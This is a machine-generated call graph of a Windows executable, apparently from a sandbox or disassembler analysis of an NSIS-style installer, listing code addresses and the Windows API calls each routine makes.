EnableWindow 3972 404050 3969->3972 3970 404055 GetSystemMenu EnableMenuItem SendMessageW 3971 404085 SendMessageW 3970->3971 3970->3972 3971->3972 3972->3970 3993 404277 SendMessageW 3972->3993 3994 40617e lstrcpynW 3972->3994 3975 4040b3 lstrlenW 3976 4061a0 18 API calls 3975->3976 3977 4040c9 SetWindowTextW 3976->3977 3978 401389 2 API calls 3977->3978 3978->3949 3980 404127 CreateDialogParamW 3979->3980 3979->3988 3981 40415a 3980->3981 3980->3988 3982 404242 19 API calls 3981->3982 3983 404165 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3982->3983 3984 401389 2 API calls 3983->3984 3985 4041ab 3984->3985 3985->3951 3986 4041b3 ShowWindow 3985->3986 3987 40428e SendMessageW 3986->3987 3987->3988 3988->3948 3988->3951 3990 4061a0 18 API calls 3989->3990 3991 40424d SetDlgItemTextW 3990->3991 3991->3965 3992->3969 3993->3972 3994->3975 3996 404222 3995->3996 3997 404228 SendMessageW 3995->3997 3996->3997 3997->3960 3999 4042c1 GetWindowLongW 3998->3999 4009 40434a 3998->4009 4000 4042d2 3999->4000 3999->4009 4001 4042e1 GetSysColor 4000->4001 4002 4042e4 4000->4002 4001->4002 4003 4042f4 SetBkMode 4002->4003 4004 4042ea SetTextColor 4002->4004 4005 404312 4003->4005 4006 40430c GetSysColor 4003->4006 4004->4003 4007 404323 4005->4007 4008 404319 SetBkColor 4005->4008 4006->4005 4007->4009 4010 404336 DeleteObject 4007->4010 4011 40433d CreateBrushIndirect 4007->4011 4008->4007 4009->3951 4010->4011 4011->4009 4628 4021ea 4629 402bbf 18 API calls 4628->4629 4630 4021f0 4629->4630 4631 402bbf 18 API calls 4630->4631 4632 4021f9 4631->4632 4633 402bbf 18 API calls 4632->4633 4634 402202 4633->4634 4635 4064c1 2 API calls 4634->4635 4636 40220b 4635->4636 4637 40221c lstrlenW lstrlenW 4636->4637 4638 40220f 4636->4638 4640 4052dd 25 API calls 4637->4640 4639 4052dd 25 API calls 4638->4639 4642 402217 4638->4642 4639->4642 4641 40225a SHFileOperationW 4640->4641 4641->4638 4641->4642 4643 40156b 4644 401584 4643->4644 4645 40157b ShowWindow 4643->4645 4646 401592 ShowWindow 4644->4646 4647 402a4c 4644->4647 4645->4644 4646->4647 4651 40226e 4652 402275 4651->4652 4655 402288 4651->4655 4653 4061a0 18 API calls 4652->4653 4654 402282 4653->4654 4656 4058c3 MessageBoxIndirectW 4654->4656 4656->4655 4657 4014f1 SetForegroundWindow 4658 402a4c 4657->4658 4659 401673 4660 402bbf 18 API calls 4659->4660 4661 40167a 4660->4661 4662 402bbf 18 API calls 4661->4662 4663 401683 4662->4663 4664 402bbf 18 API calls 4663->4664 4665 40168c MoveFileW 4664->4665 4666 40169f 4665->4666 4672 401698 4665->4672 4667 4021e1 4666->4667 4669 4064c1 2 API calls 4666->4669 4668 401423 25 API calls 4668->4667 4670 4016ae 4669->4670 4670->4667 4671 40601f 38 API calls 4670->4671 4671->4672 4672->4668 4673 401cfa GetDlgItem GetClientRect 4674 402bbf 18 API calls 4673->4674 4675 401d2c LoadImageW SendMessageW 4674->4675 4676 401d4a DeleteObject 4675->4676 4677 402a4c 4675->4677 4676->4677 4117 40237b 4118 402381 4117->4118 4119 402bbf 18 API calls 4118->4119 4120 402393 4119->4120 4121 402bbf 18 API calls 4120->4121 4122 40239d RegCreateKeyExW 4121->4122 4123 4023c7 4122->4123 4124 402a4c 4122->4124 4126 4023e2 4123->4126 4127 402bbf 18 API calls 4123->4127 4125 4023ee 4130 402409 RegSetValueExW 4125->4130 4131 4030e7 45 API calls 4125->4131 4126->4125 4134 402ba2 4126->4134 4128 4023d8 lstrlenW 4127->4128 4128->4126 4132 40241f RegCloseKey 4130->4132 4131->4130 4132->4124 4135 4061a0 18 API calls 4134->4135 4136 402bb6 4135->4136 4136->4125 4685 4027fb 4686 402bbf 18 API calls 4685->4686 4687 402802 FindFirstFileW 4686->4687 4688 40282a 4687->4688 4692 402815 4687->4692 4689 402833 4688->4689 4693 4060c5 wsprintfW 4688->4693 4694 40617e lstrcpynW 4689->4694 4693->4689 4694->4692 4702 4014ff 4703 401507 4702->4703 4705 40151a 4702->4705 4704 402ba2 18 API calls 4703->4704 4704->4705 4706 401000 4707 401037 BeginPaint GetClientRect 4706->4707 4708 40100c DefWindowProcW 4706->4708 4710 4010f3 4707->4710 4711 401179 4708->4711 4712 401073 CreateBrushIndirect FillRect DeleteObject 4710->4712 4713 4010fc 4710->4713 4712->4710 4714 401102 CreateFontIndirectW 4713->4714 4715 401167 EndPaint 4713->4715 4714->4715 4716 401112 6 API calls 4714->4716 4715->4711 4716->4715 4724 401904 4725 40193b 4724->4725 4726 402bbf 18 API calls 4725->4726 4727 401940 4726->4727 4728 40596f 69 API calls 4727->4728 4729 401949 4728->4729 4730 402d04 4731 402d16 SetTimer 4730->4731 4732 402d2f 4730->4732 4731->4732 4733 402d7d 4732->4733 4734 402d83 MulDiv 4732->4734 4735 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 4734->4735 4735->4733 4737 403985 4738 403990 4737->4738 4739 403997 GlobalAlloc 4738->4739 4740 403994 4738->4740 4739->4740 4741 402786 4742 4029f7 4741->4742 4743 40278d 4741->4743 4744 402ba2 18 API calls 4743->4744 4745 402798 4744->4745 4746 40279f SetFilePointer 4745->4746 4746->4742 4747 4027af 4746->4747 4749 4060c5 wsprintfW 4747->4749 4749->4742 4750 401907 4751 402bbf 18 API calls 4750->4751 4752 40190e 4751->4752 4753 4058c3 MessageBoxIndirectW 4752->4753 4754 401917 4753->4754 3881 401e08 3882 402bbf 18 API calls 3881->3882 3883 401e0e 3882->3883 3884 402bbf 18 API calls 3883->3884 3885 401e17 3884->3885 3886 402bbf 18 API calls 3885->3886 3887 401e20 3886->3887 3888 402bbf 18 API calls 3887->3888 3889 401e29 3888->3889 3890 401423 25 API calls 3889->3890 3891 401e30 ShellExecuteW 3890->3891 3892 401e61 3891->3892 4760 1000194f GetCommandLineW lstrcpynW 4761 100019a3 4760->4761 4762 100019c4 CharNextW 4761->4762 4763 100019b9 CharNextW 4761->4763 4765 100019c9 CreateProcessW 4762->4765 4763->4761 4766 100019f7 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4765->4766 4767 10001a28 ExitProcess 4765->4767 4768 404390 lstrlenW 4769 4043b1 WideCharToMultiByte 4768->4769 4770 4043af 4768->4770 4770->4769 4771 401491 4772 4052dd 25 API calls 4771->4772 4773 401498 4772->4773 4781 401a15 4782 402bbf 18 API calls 4781->4782 4783 401a1e ExpandEnvironmentStringsW 4782->4783 4784 401a32 4783->4784 4786 401a45 4783->4786 4785 401a37 lstrcmpW 4784->4785 4784->4786 4785->4786 4787 402515 4788 402bbf 18 API calls 4787->4788 4789 40251c 4788->4789 4792 405d53 GetFileAttributesW CreateFileW 4789->4792 4791 402528 4792->4791 4793 402095 4794 402bbf 18 API calls 4793->4794 4795 40209c 4794->4795 4796 402bbf 18 API calls 4795->4796 4797 4020a6 4796->4797 4798 402bbf 18 API calls 4797->4798 4799 4020b0 4798->4799 4800 402bbf 18 API calls 4799->4800 4801 4020ba 4800->4801 4802 402bbf 18 API calls 4801->4802 4804 4020c4 4802->4804 4803 402103 CoCreateInstance 4808 402122 4803->4808 4804->4803 4805 402bbf 18 API calls 4804->4805 4805->4803 4806 401423 25 API calls 4807 4021e1 4806->4807 4808->4806 4808->4807 4809 401b16 4810 402bbf 18 API calls 4809->4810 4811 401b1d 4810->4811 4812 402ba2 18 API calls 4811->4812 4813 401b26 wsprintfW 4812->4813 4814 402a4c 4813->4814 4815 404696 4816 4046a6 4815->4816 4817 4046cc 4815->4817 4819 404242 19 API calls 4816->4819 4818 4042a9 8 API calls 4817->4818 4820 4046d8 4818->4820 4821 4046b3 SetDlgItemTextW 4819->4821 4821->4817 4012 1000105a 4015 10001112 4012->4015 4094 10001096 GetModuleHandleW GetProcAddress 4015->4094 4018 10001147 GetModuleFileNameW GlobalAlloc 4021 1000118e 4018->4021 4019 1000128c GlobalAlloc 4020 100012aa 4019->4020 4022 100012c2 FindWindowExW FindWindowExW 4020->4022 4035 100012e4 4020->4035 4023 10001194 CharPrevW 4021->4023 4024 100011ae 4021->4024 4022->4035 4023->4021 4023->4024 4026 100011b8 4024->4026 4027 100011ce GetTempFileNameW CopyFileW 4024->4027 4107 10001a73 4026->4107 4029 10001203 CreateFileW CreateFileMappingW MapViewOfFile 4027->4029 4030 1000126d lstrcatW lstrlenW 4027->4030 4031 10001239 UnmapViewOfFile 4029->4031 4032 1000125f CloseHandle CloseHandle 4029->4032 4030->4020 4031->4032 4032->4030 4034 100011c2 GlobalFree 4036 10001085 4034->4036 4037 1000130a lstrcmpiW 4035->4037 4097 10001a33 4035->4097 4102 10001849 lstrlenW lstrlenW 4035->4102 4037->4035 4038 10001326 4037->4038 4039 10001357 GetVersion 4038->4039 4040 1000132b 4038->4040 4042 100013ca GlobalAlloc 4039->4042 4043 100013fc 4039->4043 4041 10001a73 2 API calls 4040->4041 4044 10001335 4041->4044 4049 100016f8 lstrcpyW 4042->4049 4054 100013f2 GlobalLock 4042->4054 4046 10001424 CreatePipe 4043->4046 4047 10001406 InitializeSecurityDescriptor SetSecurityDescriptorDacl 4043->4047 4044->4034 4053 10001349 DeleteFileW 4044->4053 4048 10001441 CreatePipe 4046->4048 4046->4049 4047->4046 4048->4049 4052 10001458 GetStartupInfoW CreateProcessW 4048->4052 4051 1000170a 4049->4051 4055 10001710 4051->4055 4056 10001718 4051->4056 4052->4049 4057 100014a6 GetTickCount 4052->4057 4053->4034 4054->4043 4058 10001a73 2 API calls 4055->4058 4060 10001731 4056->4060 4062 10001726 4056->4062 4059 100014af 4057->4059 4058->4056 4059->4051 4061 100014c2 PeekNamedPipe 4059->4061 4071 100016c0 Sleep 4059->4071 4072 10001692 GetTickCount 4059->4072 4063 1000173a lstrcpyW 4060->4063 4064 1000174c 4060->4064 4061->4059 4065 100014dc GetTickCount ReadFile 4061->4065 4066 100017dd 3 API calls 4062->4066 4063->4064 4067 10001755 wsprintfW 4064->4067 4068 1000176d 4064->4068 4110 100010d3 lstrlenA 4065->4110 4070 1000172f 4066->4070 4067->4068 4073 10001a73 2 API calls 4068->4073 4070->4060 4075 100016c8 WaitForSingleObject GetExitCodeProcess PeekNamedPipe 4071->4075 4072->4071 4074 100016a1 TerminateProcess lstrcpyW 4072->4074 4076 10001779 6 API calls 4073->4076 4074->4075 4075->4059 4077 100017a8 4076->4077 4079 100017b1 DeleteFileW 4077->4079 4080 100017ba GlobalFree 4077->4080 4078 10001520 lstrlenW 4081 10001550 lstrlenW GlobalSize 4078->4081 4082 10001531 lstrlenW lstrcpynW 4078->4082 4079->4080 4080->4036 4083 100017ca GlobalUnlock GlobalFree 4080->4083 4084 1000156d GlobalUnlock GlobalReAlloc 4081->4084 4085 1000159e lstrcatW 4081->4085 4082->4075 4083->4036 4084->4049 4086 10001594 GlobalLock 4084->4086 4091 10001514 4085->4091 4086->4085 4087 10001849 5 API calls 4087->4091 4088 100015b2 GlobalSize 4089 100015d4 lstrlenW 4088->4089 4088->4091 4090 100015f3 lstrcpyW 4089->4090 4089->4091 4090->4091 4091->4075 4091->4078 4091->4087 4091->4088 4091->4090 4092 1000165f CharNextW 4091->4092 4114 100017dd 4091->4114 4092->4091 4095 100010b8 GetCurrentProcess 4094->4095 4096 100010c5 4094->4096 4095->4096 4096->4018 4096->4019 4098 10001a6c 4097->4098 4099 10001a3d 4097->4099 4098->4035 4099->4098 4100 10001a4a lstrcpyW 4099->4100 4101 10001a5d GlobalFree 4099->4101 4100->4101 4101->4098 4103 100018a4 4102->4103 4104 1000186a lstrcmpiW 4102->4104 4103->4035 4104->4103 4106 10001893 CharNextW lstrlenW 4104->4106 4106->4103 4106->4104 4108 10001ab6 4107->4108 4109 10001a7c GlobalAlloc lstrcpynW 4107->4109 4108->4034 4109->4108 4111 10001102 lstrcpyW 4110->4111 4112 100010ee MultiByteToWideChar 4110->4112 4113 1000110c 4111->4113 4112->4113 4113->4091 4115 10001845 4114->4115 4116 100017fd SendMessageW SendMessageW SendMessageW 4114->4116 4115->4091 4116->4115 4822 40159b 4823 402bbf 18 API calls 4822->4823 4824 4015a2 SetFileAttributesW 4823->4824 4825 4015b4 4824->4825 4137 40541c 4138 4055c6 4137->4138 4139 40543d GetDlgItem GetDlgItem GetDlgItem 4137->4139 4141 4055f7 4138->4141 4142 4055cf GetDlgItem CreateThread FindCloseChangeNotification 4138->4142 4183 404277 SendMessageW 4139->4183 4144 405622 4141->4144 4147 405647 4141->4147 4148 40560e ShowWindow ShowWindow 4141->4148 4142->4141 4186 4053b0 5 API calls 4142->4186 4143 4054ad 4152 4054b4 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4143->4152 4145 405682 4144->4145 4146 40562e 4144->4146 4145->4147 4159 405690 SendMessageW 4145->4159 4149 405636 4146->4149 4150 40565c ShowWindow 4146->4150 4151 4042a9 8 API calls 4147->4151 4185 404277 SendMessageW 4148->4185 4154 40421b SendMessageW 4149->4154 4155 40567c 4150->4155 4156 40566e 4150->4156 4164 405655 4151->4164 4157 405522 4152->4157 4158 405506 SendMessageW SendMessageW 4152->4158 4154->4147 4161 40421b SendMessageW 4155->4161 4160 4052dd 25 API calls 4156->4160 4162 405535 4157->4162 4163 405527 SendMessageW 4157->4163 4158->4157 4159->4164 4165 4056a9 CreatePopupMenu 4159->4165 4160->4155 4161->4145 4166 404242 19 API calls 4162->4166 4163->4162 4167 4061a0 18 API calls 4165->4167 4169 405545 4166->4169 4168 4056b9 AppendMenuW 4167->4168 4170 4056d6 GetWindowRect 4168->4170 4171 4056e9 TrackPopupMenu 4168->4171 4172 405582 GetDlgItem SendMessageW 4169->4172 4173 40554e ShowWindow 4169->4173 4170->4171 4171->4164 4174 405704 4171->4174 4172->4164 4177 4055a9 SendMessageW SendMessageW 4172->4177 4175 405571 4173->4175 4176 405564 ShowWindow 4173->4176 4178 405720 SendMessageW 4174->4178 4184 404277 SendMessageW 4175->4184 4176->4175 4177->4164 4178->4178 4179 40573d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4178->4179 4181 405762 SendMessageW 4179->4181 4181->4181 4182 40578b GlobalUnlock SetClipboardData CloseClipboard 4181->4182 4182->4164 4183->4143 4184->4172 4185->4144 4826 401f1d 4827 402bbf 18 API calls 4826->4827 4828 401f24 4827->4828 4829 406558 5 API calls 4828->4829 4830 401f33 4829->4830 4831 401f4f GlobalAlloc 4830->4831 4840 401fb7 4830->4840 4832 401f63 4831->4832 4831->4840 4833 406558 5 API calls 4832->4833 4834 401f6a 4833->4834 4835 406558 5 API calls 4834->4835 4836 401f74 4835->4836 4836->4840 4841 4060c5 wsprintfW 4836->4841 4838 401fa9 4842 4060c5 wsprintfW 4838->4842 4841->4838 4842->4840 4843 40229d 4844 4022a5 4843->4844 4845 4022ab 4843->4845 4846 402bbf 18 API calls 4844->4846 4847 4022b9 4845->4847 4848 402bbf 18 API calls 4845->4848 4846->4845 4849 402bbf 18 API calls 4847->4849 4851 4022c7 4847->4851 4848->4847 4849->4851 4850 402bbf 18 API calls 4852 4022d0 WritePrivateProfileStringW 4850->4852 4851->4850 4187 40249e 4197 402cc9 4187->4197 4189 4024a8 4190 402ba2 18 API calls 4189->4190 4191 4024b1 4190->4191 4192 4024d5 RegEnumValueW 4191->4192 4193 4024c9 RegEnumKeyW 4191->4193 4195 40281e 4191->4195 4194 4024ee RegCloseKey 4192->4194 4192->4195 4193->4194 4194->4195 4198 402bbf 18 API calls 4197->4198 4199 402ce2 4198->4199 4200 402cf0 RegOpenKeyExW 4199->4200 4200->4189 4853 40149e 4854 402288 4853->4854 4855 4014ac PostQuitMessage 4853->4855 4855->4854 4856 40231f 4857 402324 4856->4857 4858 40234f 4856->4858 4859 402cc9 19 API calls 4857->4859 4860 402bbf 18 API calls 4858->4860 4861 40232b 4859->4861 4862 402356 4860->4862 4863 402bbf 18 API calls 4861->4863 4864 40236c 4861->4864 4867 402bff RegOpenKeyExW 4862->4867 4866 40233c RegDeleteValueW RegCloseKey 4863->4866 4866->4864 4868 402c2a 4867->4868 4874 402c76 4867->4874 4869 402c50 RegEnumKeyW 4868->4869 4870 402c62 RegCloseKey 4868->4870 4872 402c87 RegCloseKey 4868->4872 4875 402bff 5 API calls 4868->4875 4869->4868 4869->4870 4871 406558 5 API calls 4870->4871 4873 402c72 4871->4873 4872->4874 4873->4874 4876 402ca2 RegDeleteKeyW 4873->4876 4874->4864 4875->4868 4876->4874 4877 401ca3 4878 402ba2 18 API calls 4877->4878 4879 401ca9 IsWindow 4878->4879 4880 401a05 4879->4880 4881 402a27 SendMessageW 4882 402a41 InvalidateRect 4881->4882 4883 402a4c 4881->4883 4882->4883 4884 40242a 4885 402cc9 19 API calls 4884->4885 4886 402434 4885->4886 4887 402bbf 18 API calls 4886->4887 4888 40243d 4887->4888 4889 402448 RegQueryValueExW 4888->4889 4894 40281e 4888->4894 4890 40246e RegCloseKey 4889->4890 4891 402468 4889->4891 4890->4894 4891->4890 4895 4060c5 wsprintfW 4891->4895 4895->4890 4903 40172d 4904 402bbf 18 API calls 4903->4904 4905 401734 SearchPathW 4904->4905 4906 40174f 4905->4906 4907 404a33 4908 404a43 4907->4908 4909 404a5f 4907->4909 4918 4058a7 GetDlgItemTextW 4908->4918 4911 404a92 4909->4911 4912 404a65 SHGetPathFromIDListW 4909->4912 4914 404a7c SendMessageW 4912->4914 4915 404a75 4912->4915 4913 404a50 SendMessageW 4913->4909 4914->4911 4916 40140b 2 API calls 4915->4916 4916->4914 4918->4913 4919 4027b4 4920 4027ba 4919->4920 4921 4027c2 FindClose 4920->4921 4922 402a4c 4920->4922 4921->4922 3389 4033b6 SetErrorMode GetVersion 3390 4033eb 3389->3390 3391 4033f1 3389->3391 3392 406558 5 API calls 3390->3392 3477 4064e8 GetSystemDirectoryW 3391->3477 3392->3391 3394 403407 lstrlenA 3394->3391 3395 403417 3394->3395 3480 406558 GetModuleHandleA 3395->3480 3398 406558 5 API calls 3399 403426 #17 OleInitialize SHGetFileInfoW 3398->3399 3486 40617e lstrcpynW 3399->3486 3401 403463 GetCommandLineW 3487 40617e lstrcpynW 3401->3487 3403 403475 GetModuleHandleW 3404 40348d 3403->3404 3405 405b5f CharNextW 3404->3405 3406 40349c CharNextW 3405->3406 3407 4035c6 GetTempPathW 3406->3407 3414 4034b5 3406->3414 3488 403385 3407->3488 3409 4035de 3410 4035e2 GetWindowsDirectoryW lstrcatW 3409->3410 3411 403638 DeleteFileW 3409->3411 3415 403385 12 API calls 3410->3415 3498 402e41 GetTickCount GetModuleFileNameW 3411->3498 3412 405b5f CharNextW 3412->3414 3414->3412 3419 4035af 3414->3419 3421 4035b1 3414->3421 3417 4035fe 3415->3417 3416 40364c 3424 405b5f CharNextW 3416->3424 3459 4036ef 3416->3459 3472 4036ff 3416->3472 3417->3411 3418 403602 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3417->3418 3422 403385 12 API calls 3418->3422 3419->3407 3584 40617e lstrcpynW 3421->3584 3423 403630 3422->3423 3423->3411 3423->3472 3441 40366b 3424->3441 3428 403839 3430 403841 GetCurrentProcess OpenProcessToken 3428->3430 3431 4038bd ExitProcess 3428->3431 3429 403719 3610 4058c3 3429->3610 3433 403859 LookupPrivilegeValueW AdjustTokenPrivileges 3430->3433 3434 40388d 3430->3434 3433->3434 3440 406558 5 API calls 3434->3440 3436 4036c9 3585 405c3a 3436->3585 3437 40372f 3614 405846 3437->3614 3448 403894 3440->3448 3441->3436 3441->3437 3445 403750 lstrcatW lstrcmpiW 3450 40376c 3445->3450 3445->3472 3446 403745 lstrcatW 3446->3445 3447 4038a9 ExitWindowsEx 3447->3431 3451 4038b6 3447->3451 3448->3447 3448->3451 3453 403771 3450->3453 3454 403778 3450->3454 3634 40140b 3451->3634 3452 4036e4 3600 40617e lstrcpynW 3452->3600 3617 4057ac CreateDirectoryW 3453->3617 3622 405829 CreateDirectoryW 3454->3622 3528 4039c7 3459->3528 3461 40377d SetCurrentDirectoryW 3462 403798 3461->3462 3463 40378d 3461->3463 3626 40617e lstrcpynW 3462->3626 3625 40617e lstrcpynW 3463->3625 3466 4061a0 18 API calls 3467 4037d7 DeleteFileW 3466->3467 3468 4037e4 CopyFileW 3467->3468 3474 4037a6 3467->3474 3468->3474 3469 40382d 3471 40601f 38 API calls 3469->3471 3471->3472 3601 4038d5 3472->3601 3473 4061a0 18 API calls 3473->3474 3474->3466 3474->3469 3474->3473 3476 403818 CloseHandle 3474->3476 3627 40601f MoveFileExW 3474->3627 3631 40585e CreateProcessW 3474->3631 3476->3474 3478 40650a wsprintfW LoadLibraryExW 3477->3478 3478->3394 3481 406574 3480->3481 3482 40657e GetProcAddress 3480->3482 3483 4064e8 3 API calls 3481->3483 3484 40341f 3482->3484 3485 40657a 3483->3485 3484->3398 3485->3482 3485->3484 3486->3401 3487->3403 3489 406412 5 API calls 3488->3489 3490 403391 3489->3490 3491 40339b 3490->3491 3637 405b32 lstrlenW CharPrevW 3490->3637 3491->3409 3494 405829 2 API calls 3495 4033a9 3494->3495 3496 405d82 2 API calls 3495->3496 3497 4033b4 3496->3497 3497->3409 3640 405d53 GetFileAttributesW CreateFileW 3498->3640 3500 402e84 3527 402e91 3500->3527 3641 40617e lstrcpynW 3500->3641 3502 402ea7 3642 405b7e lstrlenW 3502->3642 3506 402eb8 GetFileSize 3507 402fb9 3506->3507 3526 402ecf 3506->3526 3647 402d9f 3507->3647 3511 402ffc GlobalAlloc 3514 403013 3511->3514 3512 403054 3515 402d9f 33 API calls 3512->3515 3519 405d82 2 API calls 3514->3519 3515->3527 3516 402fdd 3517 403358 ReadFile 3516->3517 3520 402fe8 3517->3520 3518 402d9f 33 API calls 3518->3526 3521 403024 CreateFileW 3519->3521 3520->3511 3520->3527 3522 40305e 3521->3522 3521->3527 3662 40336e SetFilePointer 3522->3662 3524 40306c 3663 4030e7 3524->3663 3526->3507 3526->3512 3526->3518 3526->3527 3678 403358 3526->3678 3527->3416 3529 406558 5 API calls 3528->3529 3530 4039db 3529->3530 3531 4039e1 GetUserDefaultUILanguage 3530->3531 3532 4039f3 3530->3532 3714 4060c5 wsprintfW 3531->3714 3534 40604b 3 API calls 3532->3534 3536 403a23 3534->3536 3535 4039f1 3715 403c9d 3535->3715 3537 403a42 lstrcatW 3536->3537 3538 40604b 3 API calls 3536->3538 3537->3535 3538->3537 3541 405c3a 18 API calls 3542 403a74 3541->3542 3543 403b08 3542->3543 3545 40604b 3 API calls 3542->3545 3544 405c3a 18 API calls 3543->3544 3546 403b0e 3544->3546 3547 403aa6 3545->3547 3548 403b1e LoadImageW 3546->3548 3549 4061a0 18 API calls 3546->3549 3547->3543 3552 403ac7 lstrlenW 3547->3552 3555 405b5f CharNextW 3547->3555 3550 403bc4 3548->3550 3551 403b45 RegisterClassW 3548->3551 3549->3548 3554 40140b 2 API calls 3550->3554 3553 403b7b SystemParametersInfoW CreateWindowExW 3551->3553 3583 403bce 3551->3583 3556 403ad5 lstrcmpiW 3552->3556 3557 403afb 3552->3557 3553->3550 3558 403bca 3554->3558 3560 403ac4 3555->3560 3556->3557 3561 403ae5 GetFileAttributesW 3556->3561 3559 405b32 3 API calls 3557->3559 3562 403c9d 19 API calls 3558->3562 3558->3583 3563 403b01 3559->3563 3560->3552 3564 403af1 3561->3564 3565 403bdb 3562->3565 3731 40617e lstrcpynW 3563->3731 3564->3557 3567 405b7e 2 API calls 3564->3567 3568 403be7 ShowWindow 3565->3568 3569 403c6a 3565->3569 3567->3557 3570 4064e8 3 API calls 3568->3570 3724 4053b0 OleInitialize 3569->3724 3573 403bff 3570->3573 3572 403c70 3574 403c74 3572->3574 3575 403c8c 3572->3575 3576 403c0d GetClassInfoW 3573->3576 3578 4064e8 3 API calls 3573->3578 3581 40140b 2 API calls 3574->3581 3574->3583 3577 40140b 2 API calls 3575->3577 3579 403c21 GetClassInfoW RegisterClassW 3576->3579 3580 403c37 DialogBoxParamW 3576->3580 3577->3583 3578->3576 3579->3580 3582 40140b 2 API calls 3580->3582 3581->3583 3582->3583 3583->3472 3584->3419 3740 40617e lstrcpynW 3585->3740 3587 405c4b 3741 405bdd CharNextW CharNextW 3587->3741 3590 4036d5 3590->3472 3599 40617e lstrcpynW 3590->3599 3591 406412 5 API calls 3597 405c61 3591->3597 3592 405c92 lstrlenW 3593 405c9d 3592->3593 3592->3597 3595 405b32 3 API calls 3593->3595 3596 405ca2 GetFileAttributesW 3595->3596 3596->3590 3597->3590 3597->3592 3598 405b7e 2 API calls 3597->3598 3747 4064c1 FindFirstFileW 3597->3747 3598->3592 3599->3452 3600->3459 3602 4038f0 3601->3602 3603 4038e6 CloseHandle 3601->3603 3604 403904 3602->3604 3605 4038fa CloseHandle 3602->3605 3603->3602 3750 403932 3604->3750 3605->3604 3612 4058d8 3610->3612 3611 403727 ExitProcess 3612->3611 3613 4058ec MessageBoxIndirectW 3612->3613 3613->3611 3615 406558 5 API calls 3614->3615 3616 403734 lstrcatW 3615->3616 3616->3445 3616->3446 3618 403776 3617->3618 3619 4057fd GetLastError 3617->3619 3618->3461 3619->3618 3620 40580c SetFileSecurityW 3619->3620 3620->3618 3621 405822 GetLastError 3620->3621 3621->3618 3623 405839 3622->3623 3624 40583d GetLastError 3622->3624 3623->3461 3624->3623 3625->3462 3626->3474 3628 406040 3627->3628 3629 406033 3627->3629 3628->3474 3806 405ead lstrcpyW 3629->3806 3632 405891 CloseHandle 3631->3632 3633 40589d 3631->3633 3632->3633 3633->3474 3635 401389 2 API calls 3634->3635 3636 401420 3635->3636 3636->3431 3638 4033a3 3637->3638 3639 405b4e lstrcatW 3637->3639 3638->3494 3639->3638 3640->3500 3641->3502 3643 405b8c 3642->3643 3644 405b92 CharPrevW 3643->3644 3645 402ead 3643->3645 3644->3643 3644->3645 3646 40617e lstrcpynW 3645->3646 3646->3506 3648 402db0 3647->3648 3649 402dc8 3647->3649 3652 402dc0 3648->3652 3653 402db9 DestroyWindow 3648->3653 3650 402dd0 3649->3650 3651 402dd8 GetTickCount 3649->3651 3682 406594 3650->3682 3651->3652 3655 402de6 3651->3655 3652->3511 3652->3527 3681 40336e SetFilePointer 3652->3681 3653->3652 3656 402e1b CreateDialogParamW ShowWindow 3655->3656 3657 402dee 3655->3657 3656->3652 3657->3652 3686 402d83 3657->3686 3659 402dfc wsprintfW 3660 4052dd 25 API calls 3659->3660 3661 402e19 3660->3661 3661->3652 3662->3524 3664 403112 3663->3664 3665 4030f6 SetFilePointer 3663->3665 3689 4031ef GetTickCount 3664->3689 3665->3664 3668 4031af 3668->3527 3671 4031ef 43 API calls 3672 403149 3671->3672 3672->3668 3673 4031b5 ReadFile 3672->3673 3675 403158 3672->3675 3673->3668 3675->3668 3676 405dd6 ReadFile 3675->3676 3704 405e05 WriteFile 3675->3704 3676->3675 3679 405dd6 ReadFile 3678->3679 3680 40336b 3679->3680 3680->3526 3681->3516 3683 4065b1 PeekMessageW 3682->3683 3684 4065c1 3683->3684 3685 4065a7 DispatchMessageW 3683->3685 3684->3652 3685->3683 3687 402d92 3686->3687 3688 402d94 MulDiv 3686->3688 3687->3688 3688->3659 3690 403347 3689->3690 3691 40321d 3689->3691 3692 402d9f 33 API calls 3690->3692 3706 40336e SetFilePointer 3691->3706 3698 403119 3692->3698 3694 403228 SetFilePointer 3700 40324d 3694->3700 3695 403358 ReadFile 3695->3700 3697 402d9f 33 API calls 3697->3700 3698->3668 3702 405dd6 ReadFile 3698->3702 3699 405e05 WriteFile 3699->3700 3700->3695 3700->3697 3700->3698 3700->3699 3701 403328 SetFilePointer 3700->3701 3707 406697 3700->3707 3701->3690 3703 403132 3702->3703 3703->3668 3703->3671 3705 405e23 3704->3705 3705->3675 3706->3694 3708 4066bc 3707->3708 3711 4066c4 3707->3711 3708->3700 3709 406754 GlobalAlloc 3709->3708 3709->3711 3710 40674b GlobalFree 3710->3709 3711->3708 3711->3709 3711->3710 3712 4067c2 GlobalFree 3711->3712 3713 4067cb GlobalAlloc 3711->3713 3712->3713 3713->3708 3713->3711 3714->3535 3716 403cb1 3715->3716 3732 4060c5 wsprintfW 3716->3732 3718 403d22 3719 4061a0 18 API calls 3718->3719 3720 403d2e SetWindowTextW 3719->3720 3721 403a52 3720->3721 3722 403d4a 3720->3722 3721->3541 3722->3721 3723 4061a0 18 API calls 3722->3723 3723->3722 3733 40428e 3724->3733 3726 4053d3 3730 4053fa 3726->3730 3736 401389 3726->3736 3727 40428e SendMessageW 3728 40540c OleUninitialize 3727->3728 3728->3572 3730->3727 3731->3543 3732->3718 3734 4042a6 3733->3734 3735 404297 SendMessageW 3733->3735 3734->3726 3735->3734 3738 401390 3736->3738 3737 4013fe 3737->3726 3738->3737 3739 4013cb MulDiv SendMessageW 3738->3739 3739->3738 3740->3587 3743 405c0c 3741->3743 3744 405bfa 3741->3744 3742 405c30 3742->3590 3742->3591 3743->3742 3746 405b5f CharNextW 3743->3746 3744->3743 3745 405c07 CharNextW 3744->3745 3745->3742 3746->3743 3748 4064e2 3747->3748 3749 4064d7 FindClose 3747->3749 3748->3597 3749->3748 3751 403940 3750->3751 3752 403945 FreeLibrary GlobalFree 3751->3752 3753 403909 3751->3753 3752->3752 3752->3753 3754 40596f 3753->3754 3755 405c3a 18 API calls 3754->3755 3756 40598f 3755->3756 3757 405997 DeleteFileW 3756->3757 3758 4059ae 3756->3758 3759 403708 OleUninitialize 3757->3759 3760 405ad9 3758->3760 3793 40617e lstrcpynW 3758->3793 3759->3428 3759->3429 3760->3759 3767 4064c1 2 API calls 3760->3767 3762 4059d4 3763 4059e7 